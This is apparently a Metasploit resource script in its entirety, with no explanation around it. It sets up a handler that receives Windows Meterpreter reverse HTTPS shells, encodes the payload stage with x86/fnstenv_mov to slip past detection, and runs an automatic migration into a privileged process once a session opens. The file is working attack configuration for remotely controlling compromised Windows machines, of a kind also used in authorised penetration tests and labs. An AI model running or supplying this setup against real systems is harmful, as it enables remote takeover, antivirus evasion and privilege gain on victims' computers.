use exploit/multi/handler
set EnableStageEncoding true
set StageEncoder x86/fnstenv_mov

set payload windows/meterpreter/reverse_https
set LHOST 172.16.177.200
#set LHOST 192.168.154.200
set LPORT 4444
set autorunscript post/windows/manage/priv_migrate
exploit
